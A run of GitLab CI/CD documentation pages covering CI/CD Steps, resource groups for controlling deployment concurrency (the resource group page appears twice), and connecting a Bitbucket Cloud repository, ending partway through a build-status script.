Executable steps export an environment variable by adding a line to the `${{export_file}}` in JSON Lines format. Each line is a JSON object with `name` and `value` key pairs. Both `name` and `value` must be strings.

For example, to set the variable `GOPATH` to value `/go`:

```yaml
spec:
---
exec:
  command:
    - bash
    - -c
    - echo '{"name":"GOPATH","value":"/go"}' >${{export_file}}
```

#### Run a sequence of steps

A step declares it runs a sequence of steps by using the `run` keyword. Steps run one at a time in the order they are defined in the list. This is the same syntax used by the job-level `run` keyword.
Steps must have a name consisting only of alphanumeric characters and underscores, and must not start with a number.

For example, this step installs Go, then runs a second step that expects Go to already have been installed:

```yaml
spec:
---
run:
  - name: install_go
    step: ./go-steps/install-go
    inputs:
      version: "1.22"
  - name: format_go_code
    step: ./go-steps/go-fmt
    inputs:
      code: path/to/go-code
```

##### Return an output

Outputs are returned from a sequence of steps by using the `outputs` keyword. The type of value in the output must match the type of the output in the step specification.

For example, the following step returns the installed Java version as an output. This assumes the `install_java` step returns an output named `java_version`.

```yaml
spec:
  outputs:
    java_version:
      type: string
---
run:
  - name: install_java
    step: ./common/install-java
outputs:
  java_version: "the java version is ${{steps.install_java.outputs.java_version}}"
```

Alternatively, all outputs of a sub-step can be returned using the `delegate` keyword. For example:

```yaml
spec:
  outputs: delegate
---
run:
  - name: install_java
    step: ./common/install-java
delegate: install_java
```

## Combine CI/CD Components and CI/CD Steps

[CI/CD components](../components/_index.md) are reusable single pipeline configuration units. They are included in a pipeline when it is created, adding jobs and configuration to the pipeline. Files such as common scripts or programs from the component project cannot be referenced from a CI/CD job.

CI/CD Steps are reusable units of a job. When the job runs, the referenced step is downloaded to the execution environment or image, bringing along any extra files included with the step. Execution of the step replaces the `script` in the job.

Components and steps work well together to create solutions for CI/CD pipelines. Steps handle the complexity of how jobs are composed, and automatically retrieve the files necessary to run the job.
Components provide a method to import job configuration, but hide the underlying job composition from the user.

Steps and components use different syntax for expressions to help differentiate the expression types. Component expressions use square brackets `$[[ ]]` and are evaluated during pipeline creation. Step expressions use braces `${{ }}` and are evaluated during job execution, just before executing the step.

For example, a project could use a component that adds a job to format Go code:

- In the project's `.gitlab-ci.yml` file:

  ```yaml
  include:
    - component: gitlab.com/my-components/go@main
      inputs:
        fmt_packages: "./..."
  ```

- Internally, the component uses CI/CD steps to compose the job, which installs Go and then runs the formatter. In the component's `templates/go.yml` file:

  ```yaml
  spec:
    inputs:
      fmt_packages:
        description: The Go packages that will be formatted using the Go formatter.
      go_version:
        default: "1.22"
        description: The version of Go to install before running go fmt.
  ---
  format code:
    run:
      - name: install_go
        step: ./languages/go/install
        inputs:
          version: $[[ inputs.go_version ]] # version set to the value of the component input go_version
      - name: format_code
        step: ./languages/go/go-fmt
        inputs:
          go_binary: ${{ steps.install_go.outputs.go_binary }} # go_binary set to the value of the go_binary output from the previous step
          fmt_packages: $[[ inputs.fmt_packages ]] # fmt_packages set to the value of the component input fmt_packages
  ```

In this example, the CI/CD component hides the complexity of the steps from the component's users.

## Troubleshooting

### Fetching steps from an HTTPS URL

An error message such as `tls: failed to verify certificate: x509: certificate signed by unknown authority` indicates that the operating system does not recognize or trust the server hosting the step. A common cause is when steps are run in a job with a Docker image that doesn't have any trusted root certificates installed.
Resolve the issue by installing certificates in the container or by baking them into the job `image`. You can use a `script` step to install dependencies in the container before fetching any steps. For example:

```yaml
ubuntu_job:
  image: ubuntu:24.04
  run:
    - name: install_certs # Install trusted certificates first
      script: apt update && apt install --assume-yes --no-install-recommends ca-certificates
    - name: echo_step # With trusted certificates, use HTTPS without errors
      step: https://gitlab.com/user/my_steps/hello_world@main
```
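If the server uses a certificate signed by a private certificate authority, installing the `ca-certificates` package alone is not enough. A sketch of one approach follows, assuming you store the CA certificate in a `CI_CUSTOM_CA_CERT` CI/CD variable; the variable name, job name, and step URL are illustrative:

```yaml
ubuntu_job:
  image: ubuntu:24.04
  run:
    - name: install_private_ca
      env:
        CA_CERT: ${{job.CI_CUSTOM_CA_CERT}} # assumed CI/CD variable holding the PEM certificate
      script: |
        apt update && apt install --assume-yes --no-install-recommends ca-certificates
        echo "$CA_CERT" > /usr/local/share/ca-certificates/private-ca.crt
        update-ca-certificates
    - name: echo_step
      step: https://gitlab.example.com/user/my_steps/hello_world@main
```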
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Control the job concurrency in GitLab CI/CD
title: Resource group
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

By default, pipelines in GitLab CI/CD run concurrently. Concurrency is an important factor in improving the feedback loop in merge requests. However, in some situations you may want to limit the concurrency of deployment jobs and run them one by one. Use resource groups to strategically control the concurrency of jobs and safely optimize your continuous deployment workflow.

## Add a resource group

You can add only one resource to a resource group.

Provided that you have the following pipeline configuration (`.gitlab-ci.yml` file in your repository):

```yaml
build:
  stage: build
  script: echo "Your build script"

deploy:
  stage: deploy
  script: echo "Your deployment script"
  environment: production
```

Every time you push a new commit to a branch, it runs a new pipeline that has two jobs, `build` and `deploy`. But if you push multiple commits in a short interval, multiple pipelines start running simultaneously, for example:

- The first pipeline runs the jobs `build` -> `deploy`
- The second pipeline runs the jobs `build` -> `deploy`

In this case, the `deploy` jobs across different pipelines could run concurrently against the `production` environment. Running multiple deployment scripts against the same infrastructure could harm or confuse the instance, and in the worst case leave it in a corrupted state.

To ensure that only one `deploy` job runs at a time, specify the [`resource_group` keyword](../yaml/_index.md#resource_group) on the concurrency-sensitive job:

```yaml
deploy:
  # ...
  resource_group: production
```

With this configuration, deployment safety is ensured while you can still run `build` jobs concurrently to maximize pipeline efficiency.
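Resource groups also serialize jobs in the same pipeline. In the following sketch (the job names and environments are illustrative), both deployment jobs share the `production` resource group, so they run one at a time even though they are in the same stage:

```yaml
deploy_eu:
  stage: deploy
  script: echo "Deploy to the EU region"
  resource_group: production # shared resource group serializes both jobs
  environment: production/eu

deploy_us:
  stage: deploy
  script: echo "Deploy to the US region"
  resource_group: production
  environment: production/us
```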
## Prerequisites

- Familiarity with [GitLab CI/CD pipelines](../pipelines/_index.md)
- Familiarity with [GitLab environments and deployments](../environments/_index.md)
- At least the Developer role for the project to configure CI/CD pipelines.

## Process modes

You can select a process mode to control the job concurrency for your deployment preferences. The following modes are supported:

| Process mode | Description | When to use |
|---------------|-------------|-------------|
| `unordered` | The default process mode. Processes jobs whenever a job is ready to run. | The execution order of jobs is not important. The easiest option to use. |
| `oldest_first` | When a resource is free, picks the first job from the list of upcoming jobs sorted by pipeline ID in ascending order. | You want to execute jobs from the oldest pipeline first. Less efficient than `unordered` mode, but safer for continuous deployments. |
| `newest_first` | When a resource is free, picks the first job from the list of upcoming jobs that are sorted by pipeline ID in descending order. | You want to execute jobs from the newest pipeline and [prevent outdated deployment jobs](../environments/deployment_safety.md#prevent-outdated-deployment-jobs). Each job must be idempotent. |
| `newest_ready_first` | When a resource is free, picks the first job from the list of upcoming jobs waiting on this resource. Jobs are sorted by pipeline ID in descending order. | You want to prevent `newest_first` from prioritizing new pipelines before deploying the current pipeline. Faster than `newest_first`. Each job must be idempotent.
|

### Change the process mode

To change the process mode of a resource group, you must use the API and send a request to [edit an existing resource group](../../api/resource_groups.md#edit-an-existing-resource-group) by specifying the `process_mode`:

- `unordered`
- `oldest_first`
- `newest_first`
- `newest_ready_first`

### An example of the differences between the process modes

Consider the following `.gitlab-ci.yml`, where we have two jobs `build` and `deploy`, each running in their own stage, and the `deploy` job has a resource group set to `production`:

```yaml
build:
  stage: build
  script: echo "Your build script"

deploy:
  stage: deploy
  script: echo "Your deployment script"
  environment: production
  resource_group: production
```

If three commits are pushed to the project in a short interval, that means that three pipelines run almost at the same time:

- The first pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-1`.
- The second pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-2`.
- The third pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-3`.

Depending on the process mode of the resource group:

- If the process mode is set to `unordered`:
  - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently.
  - There is no guarantee on the job execution order, for example, `deploy-1` could run before or after `deploy-3` runs.
- If the process mode is `oldest_first`:
  - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently.
  - `deploy-1` runs first, `deploy-2` runs second, and `deploy-3` runs last.
- If the process mode is `newest_first`:
  - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently.
  - `deploy-3` runs first, `deploy-2` runs second, and `deploy-1` runs last.

## Pipeline-level concurrency control with cross-project/parent-child pipelines

You can define `resource_group` for downstream pipelines that are sensitive to concurrent executions.
The [`trigger` keyword](../yaml/_index.md#trigger) can trigger downstream pipelines, and the [`resource_group` keyword](../yaml/_index.md#resource_group) can co-exist with it. `resource_group` is efficient for controlling the concurrency of deployment pipelines, while other jobs can continue to run concurrently.

The following example has two pipeline configurations in a project. When a pipeline starts running, non-sensitive jobs are executed first and aren't affected by concurrent executions in other pipelines. However, GitLab ensures that there are no other deployment pipelines running before triggering a deployment (child) pipeline. If other deployment pipelines are running, GitLab waits until those pipelines finish before running another one.

```yaml
# .gitlab-ci.yml (parent pipeline)

build:
  stage: build
  script: echo "Building..."

test:
  stage: test
  script: echo "Testing..."

deploy:
  stage: deploy
  trigger:
    include: deploy.gitlab-ci.yml
    strategy: mirror
  resource_group: AWS-production
```

```yaml
# deploy.gitlab-ci.yml (child pipeline)

stages:
  - provision
  - deploy

provision:
  stage: provision
  script: echo "Provisioning..."

deployment:
  stage: deploy
  script: echo "Deploying..."
  environment: production
```

You must define [`trigger:strategy`](../yaml/_index.md#triggerstrategy) to ensure the lock isn't released until the downstream pipeline finishes.

## Related topics

- [API documentation](../../api/resource_groups.md)
- [Log documentation](../../administration/logs/_index.md#ci_resource_groups_jsonlog)
- [GitLab for safe deployments](../environments/deployment_safety.md)

## Troubleshooting

### Avoid dead locks in pipeline configurations

Because the [`oldest_first` process mode](#process-modes) enforces that jobs are executed in pipeline order, it might not work well with some other CI features.
For example, when you run [a child pipeline](../pipelines/downstream_pipelines.md#parent-child-pipelines) that requires the same resource group as the parent pipeline, a deadlock can occur. Here is an example of a bad setup:

```yaml
# BAD
test:
  stage: test
  trigger:
    include: child-pipeline-requires-production-resource-group.yml
    strategy: mirror

deploy:
  stage: deploy
  script: echo
  resource_group: production
  environment: production
```

In a parent pipeline, it runs the `test` job that subsequently runs a child pipeline, and the [`strategy: mirror` option](../yaml/_index.md#triggerstrategy) makes the `test` job wait until the child pipeline has finished. The parent pipeline runs the `deploy` job in the next stage, which requires a resource from the `production` resource group. If the process mode is `oldest_first`, it executes the jobs from the oldest pipelines, meaning the `deploy` job is executed next. However, the child pipeline also requires a resource from the `production` resource group. Because the child pipeline is newer than the parent pipeline, the child pipeline waits until the `deploy` job is finished, something that never happens.

In this case, you should specify the `resource_group` keyword in the parent pipeline configuration instead:

```yaml
# GOOD
test:
  stage: test
  trigger:
    include: child-pipeline.yml
    strategy: mirror
  resource_group: production # Specify the resource group in the parent pipeline

deploy:
  stage: deploy
  script: echo
  resource_group: production
  environment: production
```

### Jobs get stuck in "Waiting for resource"

Sometimes, a job hangs with the message `Waiting for resource: <resource_group>`. To resolve, first check that the resource group is working correctly:

1. Go to the job details page.
1. If the resource is assigned to a job, select **View job currently using resource** and check the job status.
   - If the status is `running` or `pending`, the feature is working correctly. Wait until the job finishes and releases the resource.
   - If the status is `created` and the [process mode](#process-modes) is either **Oldest first** or **Newest first**, the feature is working correctly. Visit the pipeline page of the job and check which upstream stage or job is blocking the execution.
   - If none of the previous conditions are met, the feature might not be working correctly. [Report the issue to GitLab](#report-an-issue).
1. If **View job currently using resource** is not available, the resource is not assigned to a job. Instead, check the resource's upcoming jobs.
   1. Get the resource's upcoming jobs with the [REST API](../../api/resource_groups.md#list-upcoming-jobs-for-a-specific-resource-group).
   1. Verify that the resource group's [process mode](#process-modes) is **Oldest first**.
   1. Find the first job in the list of upcoming jobs, and get the job details [with GraphQL](#get-job-details-through-graphql).
   1. If the first job's pipeline is an older pipeline, try to cancel the pipeline or the job itself.
   1. Optional. Repeat this process if the next upcoming job is still in an older pipeline that should no longer run.
   1. If the problem persists, [report the issue to GitLab](#report-an-issue).

#### Race conditions in complex or busy pipelines

If you can't resolve your issue with the solutions above, you might be encountering a known race condition issue. The race condition happens in complex or busy pipelines. For example, you might encounter the race condition if you have:

- A pipeline with multiple child pipelines.
- A single project with multiple pipelines running simultaneously.

If you think you are running into this problem, [report the issue to GitLab](#report-an-issue) and leave a comment on [issue 436988](https://gitlab.com/gitlab-org/gitlab/-/issues/436988) with a link to your new issue. To confirm the problem, GitLab might ask for additional details such as your full pipeline configuration.

As a temporary workaround, you can:

- Start a new pipeline.
- Re-run a finished job that has the same resource group as the stuck job. For example, if you have a `setup_job` and a `deploy_job` with the same resource group, the `setup_job` might finish while the `deploy_job` is stuck `waiting for resource`. Re-run the `setup_job` to restart the whole process and allow `deploy_job` to finish.

#### Get job details through GraphQL

You can get job information from the GraphQL API. You should use the GraphQL API if you use [pipeline-level concurrency control with cross-project/parent-child pipelines](#pipeline-level-concurrency-control-with-cross-projectparent-child-pipelines) because the trigger jobs are not accessible from the UI.

To get job information from the GraphQL API:

1. Go to the pipeline details page.
1. Select the **Jobs** tab and find the ID of the stuck job.
1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer).
1. Run the following query:

   ```graphql
   {
     project(fullPath: "<fullpath-to-your-project>") {
       name
       job(id: "gid://gitlab/Ci::Build/<job-id>") {
         name
         status
         detailedStatus {
           action {
             path
             buttonTitle
           }
         }
       }
     }
   }
   ```

   The `job.detailedStatus.action.path` field contains the job ID using the resource.

1. Run the following query and check the `job.status` field according to the criteria above. You can also visit the pipeline page from the `pipeline.path` field.

   ```graphql
   {
     project(fullPath: "<fullpath-to-your-project>") {
       name
       job(id: "gid://gitlab/Ci::Build/<job-id-currently-using-the-resource>") {
         name
         status
         pipeline {
           path
         }
       }
     }
   }
   ```

### Report an issue

[Open a new issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new) with the following information:

- The ID of the affected job.
- The job status.
- How often the problem occurs.
- Steps to reproduce the problem.

You can also [contact support](https://about.gitlab.com/support/#contact-support) for further assistance, or to get in touch with the development team.
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
description: Control the job concurrency in GitLab CI/CD
title: Resource group
breadcrumbs:
  - doc
  - ci
  - resource_groups
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

By default, pipelines in GitLab CI/CD run concurrently. Concurrency shortens the feedback loop in merge requests, but in some situations you may want to limit the concurrency of deployment jobs and run them one at a time. Use resource groups to strategically control job concurrency and keep your continuous deployment workflow safe.

## Add a resource group

You can add only one resource to a resource group.

Provided that you have the following pipeline configuration (`.gitlab-ci.yml` file in your repository):

```yaml
build:
  stage: build
  script: echo "Your build script"

deploy:
  stage: deploy
  script: echo "Your deployment script"
  environment: production
```

Every time you push a new commit to a branch, a new pipeline runs with the two jobs `build` and `deploy`. But if you push multiple commits in a short interval, multiple pipelines start running simultaneously, for example:

- The first pipeline runs the jobs `build` -> `deploy`
- The second pipeline runs the jobs `build` -> `deploy`

In this case, the `deploy` jobs across different pipelines could run concurrently against the `production` environment. Running multiple deployment scripts against the same infrastructure could interfere with each other and, in the worst case, leave it in a corrupted state.

To ensure that a `deploy` job runs only once at a time, specify the [`resource_group` keyword](../yaml/_index.md#resource_group) on the concurrency-sensitive job:

```yaml
deploy:
  # ...
  resource_group: production
```

With this configuration, deployments are safe while `build` jobs still run concurrently, maximizing pipeline efficiency.

## Prerequisites

- Familiarity with [GitLab CI/CD pipelines](../pipelines/_index.md)
- Familiarity with [GitLab environments and deployments](../environments/_index.md)
- At least the Developer role for the project to configure CI/CD pipelines.

## Process modes

You can select a process mode to control the job concurrency for your deployment preferences. The following modes are supported:

| Process mode | Description | When to use |
|--------------|-------------|-------------|
| `unordered` | The default process mode. Processes jobs whenever a job is ready to run. | The execution order of jobs is not important. The easiest option to use. |
| `oldest_first` | When a resource is free, picks the first job from the list of upcoming jobs sorted by pipeline ID in ascending order. | You want to execute jobs from the oldest pipeline first. Less efficient than `unordered` mode, but safer for continuous deployments. |
| `newest_first` | When a resource is free, picks the first job from the list of upcoming jobs sorted by pipeline ID in descending order. | You want to execute jobs from the newest pipeline and [prevent outdated deployment jobs](../environments/deployment_safety.md#prevent-outdated-deployment-jobs). Each job must be idempotent. |
| `newest_ready_first` | When a resource is free, picks the first job from the list of upcoming jobs waiting on this resource, sorted by pipeline ID in descending order. | You want to prevent `newest_first` from prioritizing new pipelines before deploying the current pipeline. Faster than `newest_first`. Each job must be idempotent. |

### Change the process mode

To change the process mode of a resource group, you must use the API and send a request to [edit an existing resource group](../../api/resource_groups.md#edit-an-existing-resource-group) by specifying the `process_mode`:

- `unordered`
- `oldest_first`
- `newest_first`
- `newest_ready_first`

### An example of the difference between the process modes

Consider the following `.gitlab-ci.yml`, where the two jobs `build` and `deploy` each run in their own stage, and the `deploy` job has a resource group set to `production`:

```yaml
build:
  stage: build
  script: echo "Your build script"

deploy:
  stage: deploy
  script: echo "Your deployment script"
  environment: production
  resource_group: production
```

If three commits are pushed to the project in a short interval, three pipelines run almost at the same time:

- The first pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-1`.
- The second pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-2`.
- The third pipeline runs the jobs `build` -> `deploy`. Let's call this deployment job `deploy-3`.

Depending on the process mode of the resource group:

- If the process mode is set to `unordered`:
  - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently.
  - There is no guarantee on the job execution order, for example, `deploy-1` could run before or after `deploy-3` runs.
- If the process mode is `oldest_first`:
  - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently.
  - `deploy-1` runs first, `deploy-2` runs second, and `deploy-3` runs last.
- If the process mode is `newest_first`:
  - `deploy-1`, `deploy-2`, and `deploy-3` do not run concurrently.
  - `deploy-3` runs first, `deploy-2` runs second, and `deploy-1` runs last.

## Pipeline-level concurrency control with cross-project/parent-child pipelines

You can define `resource_group` for downstream pipelines that are sensitive to concurrent executions.
The [`trigger` keyword](../yaml/_index.md#trigger) can trigger downstream pipelines, and the [`resource_group` keyword](../yaml/_index.md#resource_group) can co-exist with it. `resource_group` is an efficient way to control the concurrency of deployment pipelines, while other jobs can continue to run concurrently.

The following example has two pipeline configurations in a project. When a pipeline starts running, non-sensitive jobs are executed first and aren't affected by concurrent executions in other pipelines. However, GitLab ensures that there are no other deployment pipelines running before triggering a deployment (child) pipeline. If other deployment pipelines are running, GitLab waits until those pipelines finish before running another one.

```yaml
# .gitlab-ci.yml (parent pipeline)

build:
  stage: build
  script: echo "Building..."

test:
  stage: test
  script: echo "Testing..."

deploy:
  stage: deploy
  trigger:
    include: deploy.gitlab-ci.yml
    strategy: mirror
  resource_group: AWS-production
```

```yaml
# deploy.gitlab-ci.yml (child pipeline)

stages:
  - provision
  - deploy

provision:
  stage: provision
  script: echo "Provisioning..."

deployment:
  stage: deploy
  script: echo "Deploying..."
  environment: production
```

You must define [`trigger:strategy`](../yaml/_index.md#triggerstrategy) to ensure the lock isn't released until the downstream pipeline finishes.

## Related topics

- [API documentation](../../api/resource_groups.md)
- [Log documentation](../../administration/logs/_index.md#ci_resource_groups_jsonlog)
- [GitLab for safe deployments](../environments/deployment_safety.md)

## Troubleshooting

### Avoid deadlocks in pipeline configurations

Because the [`oldest_first` process mode](#process-modes) enforces job execution in pipeline order, it can interact badly with other CI features.
For example, when you run [a child pipeline](../pipelines/downstream_pipelines.md#parent-child-pipelines) that requires the same resource group as the parent pipeline, a deadlock can occur. Here is an example of a bad setup:

```yaml
# BAD
test:
  stage: test
  trigger:
    include: child-pipeline-requires-production-resource-group.yml
    strategy: mirror

deploy:
  stage: deploy
  script: echo
  resource_group: production
  environment: production
```

The parent pipeline runs the `test` job, which triggers a child pipeline, and the [`strategy: mirror` option](../yaml/_index.md#triggerstrategy) makes the `test` job wait until the child pipeline has finished. In the next stage, the parent pipeline runs the `deploy` job, which requires a resource from the `production` resource group. If the process mode is `oldest_first`, jobs are executed from the oldest pipelines, meaning the `deploy` job is executed next. However, the child pipeline also requires a resource from the `production` resource group. Because the child pipeline is newer than the parent pipeline, the child pipeline waits until the `deploy` job is finished, which never happens.

In this case, specify the `resource_group` keyword in the parent pipeline configuration instead:

```yaml
# GOOD
test:
  stage: test
  trigger:
    include: child-pipeline.yml
    strategy: mirror
  resource_group: production  # Specify the resource group in the parent pipeline

deploy:
  stage: deploy
  script: echo
  resource_group: production
  environment: production
```

### Jobs get stuck in "Waiting for resource"

Sometimes, a job hangs with the message `Waiting for resource: <resource_group>`. To resolve the issue, first check that the resource group is working correctly:

1. Go to the job details page.
1. If the resource is assigned to a job, select **View job currently using resource** and check the job status.
   - If the status is `running` or `pending`, the feature is working correctly. Wait until the job finishes and releases the resource.
   - If the status is `created` and the [process mode](#process-modes) is either **Oldest first** or **Newest first**, the feature is working correctly. Visit the pipeline page of the job and check which upstream stage or job is blocking the execution.
   - If none of the previous conditions are met, the feature might not be working correctly. [Report the issue to GitLab](#report-an-issue).
1. If **View job currently using resource** is not available, the resource is not assigned to a job. Instead, check the resource's upcoming jobs:
   1. Get the resource's upcoming jobs with the [REST API](../../api/resource_groups.md#list-upcoming-jobs-for-a-specific-resource-group).
   1. Verify that the resource group's [process mode](#process-modes) is **Oldest first**.
   1. Find the first job in the list of upcoming jobs, and get the job details [with GraphQL](#get-job-details-through-graphql).
   1. If the first job's pipeline is an older pipeline, try to cancel the pipeline or the job itself.
   1. Optional. Repeat this process if the next upcoming job is still in an older pipeline that should no longer run.
   1. If the problem persists, [report the issue to GitLab](#report-an-issue).

#### Race conditions in complex or busy pipelines

If you can't resolve your issue with the previous solutions, you might be encountering a known race condition. The race condition happens in complex or busy pipelines. For example, you might encounter it if you have:

- A pipeline with multiple child pipelines.
- A single project with multiple pipelines running simultaneously.

If you think you are running into this problem, [report the issue to GitLab](#report-an-issue) and leave a comment on [issue 436988](https://gitlab.com/gitlab-org/gitlab/-/issues/436988) with a link to your new issue. To confirm the problem, GitLab might ask for additional details such as your full pipeline configuration.

As a temporary workaround, you can:

- Start a new pipeline.
- Re-run a finished job that has the same resource group as the stuck job.

  For example, if you have a `setup_job` and a `deploy_job` with the same resource group, the `setup_job` might finish while the `deploy_job` is stuck in `Waiting for resource`. Re-run the `setup_job` to restart the whole process and allow `deploy_job` to finish.

#### Get job details through GraphQL

You can get job information from the GraphQL API. You should use the GraphQL API if you use [pipeline-level concurrency control with cross-project/parent-child pipelines](#pipeline-level-concurrency-control-with-cross-projectparent-child-pipelines), because the trigger jobs are not accessible from the UI.

To get job information from the GraphQL API:

1. Go to the pipeline details page.
1. Select the **Jobs** tab and find the ID of the stuck job.
1. Go to the [interactive GraphQL explorer](../../api/graphql/_index.md#interactive-graphql-explorer).
1. Run the following query:

   ```graphql
   {
     project(fullPath: "<fullpath-to-your-project>") {
       name
       job(id: "gid://gitlab/Ci::Build/<job-id>") {
         name
         status
         detailedStatus {
           action {
             path
             buttonTitle
           }
         }
       }
     }
   }
   ```

   The `job.detailedStatus.action.path` field contains the ID of the job using the resource.

1. Run the following query and check the `job.status` field against the criteria above. You can also visit the pipeline page from the `pipeline.path` field.

   ```graphql
   {
     project(fullPath: "<fullpath-to-your-project>") {
       name
       job(id: "gid://gitlab/Ci::Build/<job-id-currently-using-the-resource>") {
         name
         status
         pipeline {
           path
         }
       }
     }
   }
   ```

### Report an issue

[Open a new issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new) with the following information:

- The ID of the affected job.
- The job status.
- How often the problem occurs.
- Steps to reproduce the problem.

You can also [contact support](https://about.gitlab.com/support/#contact-support) for further assistance, or to get in touch with the development team.
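The REST calls referenced on this page (listing a resource group's upcoming jobs in the troubleshooting steps, and editing its process mode) can be sketched as small shell helpers. This is a sketch, not part of the official documentation: the instance URL, project ID `42`, resource group key `production`, and token are placeholders, and the endpoint paths are the ones the resource groups API documentation links to.

```shell
#!/usr/bin/env bash
# Sketch: build the resource group API URLs used on this page.
# Placeholders: replace the instance URL, project ID, group key, and token.
GITLAB_URL="https://gitlab.example.com"

# "List upcoming jobs for a specific resource group" endpoint.
upcoming_jobs_url() {
  echo "$GITLAB_URL/api/v4/projects/$1/resource_groups/$2/upcoming_jobs"
}

# "Edit an existing resource group" endpoint (used to change process_mode).
edit_resource_group_url() {
  echo "$GITLAB_URL/api/v4/projects/$1/resource_groups/$2"
}

# Print the curl commands you would run (token is a placeholder):
echo "curl --header 'PRIVATE-TOKEN: <your_token>' '$(upcoming_jobs_url 42 production)'"
echo "curl --request PUT --data 'process_mode=oldest_first' --header 'PRIVATE-TOKEN: <your_token>' '$(edit_resource_group_url 42 production)'"
```

Printing the commands instead of running them lets you review the URLs before sending authenticated requests.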
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Using GitLab CI/CD with a Bitbucket Cloud repository
breadcrumbs:
  - doc
  - ci
  - ci_cd_for_external_repos
---
{{< details >}}

- Tier: Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

GitLab CI/CD can be used with Bitbucket Cloud by:

1. Creating a [CI/CD project](_index.md).
1. Connecting your Git repository by URL.

To use GitLab CI/CD with a Bitbucket Cloud repository:

1. In Bitbucket, create an [**App password**](https://support.atlassian.com/bitbucket-cloud/docs/create-an-app-password/) to authenticate the script that sets commit build statuses in Bitbucket. Repository write permissions are required.

   ![Bitbucket Cloud app password](img/bitbucket_app_password_v10_6.png)

1. In Bitbucket, from your repository, select **Clone**, then copy the URL that starts after `git clone`.
1. In GitLab, create a project:
   1. On the left sidebar, at the top, select **Create new** ({{< icon name="plus" >}}) and **New project/repository**.
   1. Select **Run CI/CD for external repository**.
   1. Select **Repository by URL**.
   1. Complete the fields:
      - For **Git repository URL**, enter the URL of your Bitbucket repository. Make sure to remove your `@username`.
      - For **Username**, enter the username associated with the App password.
      - For **Password**, enter the App password from Bitbucket.

   GitLab imports the repository and enables [Pull Mirroring](../../user/project/repository/mirror/pull.md). You can check that mirroring is working in the project in **Settings > Repository > Mirroring repositories**.

1. In GitLab, create a [personal access token](../../user/profile/personal_access_tokens.md) with `api` scope. The token is used to authenticate requests from the webhook that is created in Bitbucket to notify GitLab of new commits.
1. In Bitbucket, from **Settings > Webhooks**, create a new webhook to notify GitLab of new commits.

   The webhook URL should be set to the GitLab API to trigger pull mirroring, using the personal access token we just generated for authentication:

   ```plaintext
   https://gitlab.example.com/api/v4/projects/:project_id/mirror/pull?private_token=<your_personal_access_token>
   ```

   The webhook trigger should be set to **Repository Push**.

   ![Bitbucket Cloud webhook](img/bitbucket_webhook_v10_6.png)

   After saving, test the webhook by pushing a change to your Bitbucket repository.

1. In GitLab, from **Settings > CI/CD > Variables**, add variables to allow communication with Bitbucket through the Bitbucket API:

   - `BITBUCKET_ACCESS_TOKEN`: The Bitbucket app password created previously. This variable should be [masked](../variables/_index.md#mask-a-cicd-variable).
   - `BITBUCKET_USERNAME`: The username of the Bitbucket account.
   - `BITBUCKET_NAMESPACE`: Set this variable if your GitLab and Bitbucket namespaces differ.
   - `BITBUCKET_REPOSITORY`: Set this variable if your GitLab and Bitbucket project names differ.

1. In Bitbucket, add a script that pushes the pipeline status to Bitbucket. The script is created in Bitbucket, but the mirroring process copies it to the GitLab mirror. The GitLab CI/CD pipeline runs the script, and pushes the status back to Bitbucket.

   Create a file `build_status`, insert the following script, and run `chmod +x build_status` in your terminal to make the script executable:

   ```shell
   #!/usr/bin/env bash

   # Push GitLab CI/CD build status to Bitbucket Cloud

   if [ -z "$BITBUCKET_ACCESS_TOKEN" ]; then
      echo "ERROR: BITBUCKET_ACCESS_TOKEN is not set"
      exit 1
   fi

   if [ -z "$BITBUCKET_USERNAME" ]; then
      echo "ERROR: BITBUCKET_USERNAME is not set"
      exit 1
   fi

   if [ -z "$BITBUCKET_NAMESPACE" ]; then
      echo "Setting BITBUCKET_NAMESPACE to $CI_PROJECT_NAMESPACE"
      BITBUCKET_NAMESPACE=$CI_PROJECT_NAMESPACE
   fi

   if [ -z "$BITBUCKET_REPOSITORY" ]; then
      echo "Setting BITBUCKET_REPOSITORY to $CI_PROJECT_NAME"
      BITBUCKET_REPOSITORY=$CI_PROJECT_NAME
   fi

   BITBUCKET_API_ROOT="https://api.bitbucket.org/2.0"
   BITBUCKET_STATUS_API="$BITBUCKET_API_ROOT/repositories/$BITBUCKET_NAMESPACE/$BITBUCKET_REPOSITORY/commit/$CI_COMMIT_SHA/statuses/build"
   BITBUCKET_KEY="ci/gitlab-ci/$CI_JOB_NAME"

   case "$BUILD_STATUS" in
   running)
      BITBUCKET_STATE="INPROGRESS"
      BITBUCKET_DESCRIPTION="The build is running!"
      ;;
   passed)
      BITBUCKET_STATE="SUCCESSFUL"
      BITBUCKET_DESCRIPTION="The build passed!"
      ;;
   failed)
      BITBUCKET_STATE="FAILED"
      BITBUCKET_DESCRIPTION="The build failed."
      ;;
   esac

   echo "Pushing status to $BITBUCKET_STATUS_API..."

   curl --request POST "$BITBUCKET_STATUS_API" \
     --user "$BITBUCKET_USERNAME:$BITBUCKET_ACCESS_TOKEN" \
     --header "Content-Type:application/json" \
     --silent \
